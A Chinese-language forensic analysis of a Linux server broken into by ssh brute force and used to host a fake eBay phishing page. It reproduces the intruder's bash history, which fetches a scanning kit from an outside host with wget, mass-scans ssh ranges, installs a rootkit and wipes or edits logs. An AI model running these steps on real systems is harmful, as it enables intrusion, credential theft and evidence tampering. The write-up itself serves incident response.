一次网络钓鱼后台的应急分析(原创)
author:bobkey
date:060521
mail:toqinbo@msn.com
网络钓鱼在我处理的过程中遇见过4次,而每次的攻击手法和工具都几乎一模一样,可以推断这是一个高度协作的黑客团伙。
接到客户应急电话,迅速赶到IDC机房,以下是分析过程。
1. 攻击过程如下:
通过系统服务漏洞攻击成功――登录系统――安装配置httpd――下载ebay伪造网络钓鱼页面文件――成功获取用户帐号和密码,并用sendmail发送到攻击者邮箱。
2. 结果分析
基本过程:
暴力破解ssh成功――登录系统――安装配置rootkit和backdoor――下载ebay伪造网络钓鱼页面文件――成功获取用户帐号和密码,并用sendmail发送到攻击者邮箱――扫描其它机器端口和猜测其它机器密码。
此机器于10月29日被入侵,根据手法和目的判断,应为一个黑客团伙所为,此前已发现过类似事件。此机已被安装rootkit和后门,不再可信,建议备份数据后重新安装系统。
攻击时间段:
10月29日09:21:33成功破解
10月29日09:24登录系统
11月5日 安装rootkit和backdoor 扫描软件
Rootkit替换了ps ls top netstat
Backdoor /usr/bin/smbd -D(文件名中含空格,见下文file命令的输出)
扫描软件位于 /.scan、/var/tmp、/var/tmp/.mr004、/usr/lib/.cgi-bin
11月5日 17:30:41 开始攻击其他机器,扫描其它机器端口和猜测其它机器密码
2.1 系统检查可疑文件
留下backdoor和rootkit和多个黑客工具
/usr/lib/.cgi-bin,黑客工具
/var/tmp/.mr004黑客工具
/.scan 黑客工具
/home/home黑客工具
/home/m.log ip记录
games /usr/games黑客工具
/var/tmp 黑客工具
/tmp/screens黑客工具
/usr/bin/ 目录下的 smbd -D 为后门进程,用ps看不到,可用pstree和lsof看到
file /usr/bin/smbd\ -D
/usr/bin/smbd -D: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), for GNU/Linux 2.0.0, dynamically linked (uses shared libs), not stripped
用ps -ef看不到系统真实的进程信息,ps命令已被替换
2.2 日志分析
原文以红色标记分析注释,其余为原始记录;纯文本中颜色已丢失,穿插在命令之间的中文说明即为分析注释
~/.bash_history
此文件为以前创建,但history内容已被部分删除
cd /usr/lib/.cgi-bin/
ls
cd .mr
cd /usr/games
建立目录
mkdir .cgi
cd .cgi/
ls
下载扫描器
wget www.tomis3.us/Hacks/scan.tgz
ftp
ftp 68.142.234.89
解压并删除原文件
tar zxzvf scan.tgz ;rm -rf scan.tgz \
tar zxzvf scan.tgz ;rm -rf scan.tgz
cd .mr004/
ls
rm -rf pass_file
cd ..
mv pass_file .mr004/
cd .mr004/
ls
screen已经被删除,恶意软件
screen
cat vuln.txt
rm -rf vuln.txt
cd /var/tmp/.mr004/
cat vuln.txt
ls -la
screen -r
screen -r 4583.pts-0.Linuxbackup
screen -wipe
screen
exit
socklist
w
screen -r
history
cd .scan
ls
cd /var/tmp
cd .mr004
ls
杀死screen进程
killall -9 screen
killall -9 SCREEN
扫描:分析x脚本的内容可知,129作为参数$1传入,表示对129段的地址依次扫描22端口(ssh)的目标机器
./x 129
Ls
查看扫描结果
cat vuln.txt
screen –r
继续扫207开始的地址
./x 207
pwd
cd /var/tmp/.mr004
killall -9 screen
service ssh restart
service sshd restart
service sshd reload
history
locate bios.txt
cd /home/.scan/.mr004/
ls -a
ps ax
screen -r 5180
screen -wipe
ls -a
rm -rf .mr004 .ssh-scan.swp mfu.txt bios.txt
ls -a
pico pass_file
nano pass_file
rm -rf pass_file
nano pass_file
screen
cd /usr/lib/.cgi-bin/
ls
w
sense /usr/lib/libice
cd .mr
ls
cd /usr/games/
cd .cgi/
ls
cd .mr004/
ls
cat vul
cat mfu.txt
ps –aux
查找扫描结果,傻了吧
locate mfu.txt
cd /home/.scan/.mr004/
ls
cat mfu.txt
ls
做贼心虚,经常看是否有人在线否
w
cd /usr/lib/.cgi-bin/
ls
cd .c
ls
cd .mr004/
ls
cat vuln.txt
ls
还看,唉
w
ls
有完没完
w
删除mail日志,毒
rm -rf /var/spool/mail/root
ls
cd ..
ls
胆小的黑客
w
rm -rf .mr004/
下载黑客工具,开始已经下了,估计又找不到了,重下
wget www.tomis3.us/Hacks/scan.tgz
ftp
rm -rf .mr
tar zxzvf scan.tgz ;rm -rf scan.tgz
cd .mr004/
l
cd .mr004
ls
扫描210段的ssh
./x 210
W
扫描194段的ssh
./x 194
ls
rm -rf mfu.txt
rm -rf bios.txt
扫描205段的ssh
./x 205
w
history
cd /home/.scan/.mr004/
ls
screen
screen -r
w
查看进程
ps aux
然后重启
reboot
cd /usr/games/
cd .mr
ls
cd .cgi
cd .mr004/
cat vul
ls
ps -aux
cd /home/.scan/
ls
cd .mr004/
ls
查看自己的痕迹
history
killall -9 screen
cd /usr/games/.cgi
ls
cd .mr004/
ls
cat pass_file
screen
继续扫61段
./x 61
w
ps aux
cd .scan
ls -a
cd .ssh
ls
cd ..
cd /tmp
ls -a
cd screens
ls
cd S-root
ls
cd ..
ls
history
cd /home/.scan/.mr004/
ls
./x 71
cd /etc
ls
pwd
修改了口令档案
vi passwd
vi shadow
看磁盘空间
df –k
下面大量查看进程和端口行为
ps -ef
ps -ef
more /etc/shadow
sync
sync
sync
reboot
ps -ef
last -2-
last -20
ps -ef
which ps
ls -l /bin/ps
top
ls
lsof -a
lsof
lsof |more
lsof |more
ls
lsof |more
1586 daemon mem REG 8,1 1563240 160325 /lib/tls/libc-2.3.2.so
ls
lsof -l | more
lsof -l | more
cd /dev/initctl
env
LANG=C
export
lsof -l | more
cd /dev
cd initctl
ls -ln initctl
more initctl
netstat -an
netstat -an
ps -ef
last
lsof
lsof -l | more
migration
ps -ef
lsof -l | more
cd /
./migration
ls -a
find / -name migration
netstat -an
netstat -an | more
netstat -an | more
lsof -l | more
ls
lsof
看登录日志
last
reboot
last
date
cd /var
ls
cd log
ls
ls -ln lastlog
date
修改lastlog权限并删除部分内容
chmod 777 lastlog
ls -ln
ls -ln lastlog
more lastlog
!
ls
vi lastlog
cd /etc
ls
vi hosts.allow
ls
last
su - goldensai
last
last
修改了hosts.allow,该文件已不可信
vi hosts.allow
ls
ls
last
netstat -an
ps -ef
cd /etc
vi hosts.allow
ls
ls
ls
lsof | more
lsof
last
cd /var/log
ls
more messages
ls
查看日志
tail messages
ls
last
cd /etc
查看允许登录ip列表的文件
more hosts.allow
last
cd /var
;s
ls
cd log
ls
tail messages
ls
ls -ln
more xferlog
cd /home/home
ls
ls -ln
ls -l
pw
pwd
cd ..
ls
pwd
cd ..
ls
cd home
ls
cd home
ls
解压rootkit文件
tar -xvf rk.tar
ls -ln
cd red
ls
cd crontabs
LANG=C
export LANG
LS
Ls
查看计划任务
more crontabs
ls
ls -l
pwd
cd ..
ls
这个黑客水平不咋样,碰到zip文件就傻了,不会解压了
tar mail.zip
tar -xvf mail.zip
ls
终于解压了
unzip mail.zip
ls
ls
ls
ls -ln
ls -ln
pwd
pwd
pwd
cd ..
ls
ls
cd /var
ls
cd log
ls'
ls
tail xferlog
tail -50 xferlog
ls
tail messages
tail -50 messages
ls
cd /home/home
ls
ls -ln
ps -ef | more
uname -a
lsof | more
last | more
cd /var
ls
cd log
ls
ls -l
ls -l messages*
唉,肯定删除了内容,重要的被抹去了
vi messages.1
tail messages.1
ls
vi messages
netstat -na | more
lsof -i : 23
lsof -i :23
lsof -i :111
more /etc/hosts.allow
more /etc/hosts.deny
vi /etc/hosts.deny
ps -ef | more
到收尾阶段了,不停查看日志和进程信息
lsof | more
netstat -na | more
lsof -i :1011
last | more
last | more
cd /var
ls
cd log
ls
more lastlog
ls
more secure
ls
修改了secure和messages日志
vi secure
ls
vi messages
lsof | more
ps -ef | grep vsftpd
find / -name vsftpd
ls -l /usr/sbin/vsftpd
man vsftpd
lsof -i :21
ps -ef | grep smbd
man smbd
ps -ef | grep cupsd
ps -ef
ps
man ps
ps -e
ps -A
ps -er
ps -A
ps -d
ps -e
lsof | more
cd /etc
ls
ls rc*.d
cd rc2.d
ls
clear
ls -l S*
clear
ls S*
ls
cd ..
ls
cd xinetd.conf
more xinetd.conf
ls
cd xinetd.d
ls
ls -l
more krb5-telnet
ls
cd ..
cd rc0.d
ls S*
cd ..
cd rc1.d
ls S*
ls -l
clear
ls -l S*
cd ..
cd rc2.d
ls -l S*
cd ..
ls
cd rc3.d
ls -l S*
cd ..
ls
cd rc4.d
ls -l S*
cd ..
man find
查找所有指定时间内修改了的文件
find rc*.d -c -30
man find
find rc*.d -ctime -15
find rc*.d -ctime -30
find / -ctime -15
clear
ls
cd /home
ls
find /usr -ctime -15 > m.log
more m.log
ls -l /usr/bin/socklist
ls -l /usr/games/.cgi/.mr004/x
ls -ld /usr/games
ls -ld /usr/lib/.cgi-bin
man socklist
ls -l /usr/include/iceseed.h
more /usr/include/iceseed.h
more m.log
ls -l /usr/include/icepid.h
more /usr/include/icepid.h
ls -ld /usr/games
cd /usr/games/.cgi
ls
ls -a
cd .mr004
ls
more gen-pass.sh
ls
more pass_file
ls
ls -l psscan2
ls -l ssh-scan
more ssh-scan
ps -ef | grep ssh-scan
pwd
ls
ls SS
ls X
ls a
more a
ls
more bios.txt
ls
secure.2 和 messages.4
日志中有大量远程暴力破解ssh、telnet用户名和口令的记录,来源ip各不相同
Oct 24 00:50:14 Linuxbackup sshd[1691]: Failed password for illegal user toor from 219.254.35.71 port 33558 ssh2
Oct 24 00:50:18 Linuxbackup sshd[1693]: Illegal user user from 219.254.35.71
Oct 24 00:50:20 Linuxbackup sshd[1693]: Failed password for illegal user user from 219.254.35.71 port 34522 ssh2
Oct 24 00:50:22 Linuxbackup sshd[1695]: Illegal user user from 219.254.35.71
Oct 29 13:56:22 Linuxbackup xinetd[1462]: START: telnet pid=1863 from=219.130.167.11
messages.2
内核错误日志:61.144.56.34向广播地址发送了无效的ICMP type 11, code 1报文,经网卡eth0发出
Oct 23 04:06:43 Linuxbackup kernel: 61.144.56.34 sent an invalid ICMP type 11, code 1 error to a broadcast: 0.0.0.0 on eth0
10月23日来自美国的ip成功通过后门连接进来
Oct 23 16:51:52 Linuxbackup smbd -D[31033]: log: Connection from 85.186.209.59 port 1172
这些地址也都成功登录过本机
IP : 61.129.78.101
地址: 上海市浦东新区 ADSL
IP : 218.5.5.3
地址: 福建省福州市 福建政法管理干部学院
IP : 205.234.137.241
地址: 美国/加拿大 CZ88.NET
Access.log.2
有如下可疑访问,证明访问者访问了伪造的ebay登录页面。黑客在/var/www/html/.eBay下制作了伪造的Investigation页面和账号校验页面,诱使ebay用户登录,从而获取账户信息
212.93.137.44 - - [28/Oct/2005:04:12:21 +0800] "GET /icons/unknown.gif HTTP/1.0" 200 245 "http://61.144.56.34/.eBay/eBayISAPI.dll.SignIn/.eBay_Account_Investigation/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
212.93.137.44 - - [28/Oct/2005:04:28:51 +0800] "GET /.eBay/eBayISAPI.dll.SignIn/.eBay_Account_Investigation/eBay_com%20Verify%20your%20eBay%20account_files/cobrand_determine.js HTTP/1.0" 304 - "http://61.144.56.34/.eBay/eBayISAPI.dll.SignIn/.eBay_Account_Investigation/eBay_com%20Verify%20your%20eBay%20account.htm" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
maillog.2
骗取到的口令通过sendmail发送到以下多个邮箱地址: capdemagar@yahoo.com sanuciordesti@yahoo.com multecarti@yahoo.com cr3ativexxl@yahoo.com multew@4x.ro
Oct 28 04:14:59 Linuxbackup sendmail[29986]: j9RKExXt029986: to=antrax<sanuciordesti@yahoo.com>, delay=00:00:00, mailer=esmtp, pri=30117, dsn=4.4.3, stat=queued
Oct 28 04:17:03 Linuxbackup sendmail[29988]: j9RKH3Sd029988: to=antrax<capdemagar@yahoo.com>, delay=00:00:00, mailer=esmtp, pri=30326, dsn=4.4.3, stat=queued
Oct 29 13:05:50 Linuxbackup sendmail[1856]: j9T55oLr001856: from=root, size=1960, class=0, nrcpts=1, msgid=<200510290505.j9T55oLr001856@localhost.localdomain>, relay=root@localhost
Oct 29 13:05:50 Linuxbackup sendmail[1856]: j9T55oLr001856: to=multecarti@yahoo.com, delay=00:00:00, mailer=esmtp, pri=31960, dsn=4.4.3, stat=queued
Oct 17 23:03:09 Linuxbackup sendmail[12283]: j9HF398d012283: to=cr3ativexxl@yahoo.com, delay=00:00:00, mailer=esmtp, pri=31525, dsn=4.4.3, stat=queued
Oct 19 06:20:47 Linuxbackup sendmail[31147]: j9IMKlTN031147: from=root, size=3346, class=0, nrcpts=1, msgid=<200510182220.j9IMKlTN031147@localhost.localdomain>, relay=root@localhost
Oct 19 06:20:47 Linuxbackup sendmail[31147]: j9IMKlTN031147: to=multew@4x.ro, delay=00:00:00, mailer=esmtp, pri=33346, dsn=4.4.3, stat=queued
网络钓鱼攻击的一些特点:
1 大规模扫描有漏洞的主机
2 批量扫描工具
3 攻陷有漏洞的主机
4 个人PC主机
5 架设钓鱼网站
6 前台假冒网站:知名的金融机构、在线电子商务网站
7 后台脚本:收集、验证用户输入,并通过某种渠道转发给钓鱼者
它的攻击目标只有一个:获取个人敏感信息(信用卡帐号密码等)
伪装成知名金融机构及商务网站架设站点来欺骗用户
并且会发送大量欺骗性垃圾邮件到各个用户
所以现在的黑客已经从原来单纯的技术研究和破坏转向以经济利益为目的的攻击,而且加强了攻击的协作化和批量自动化。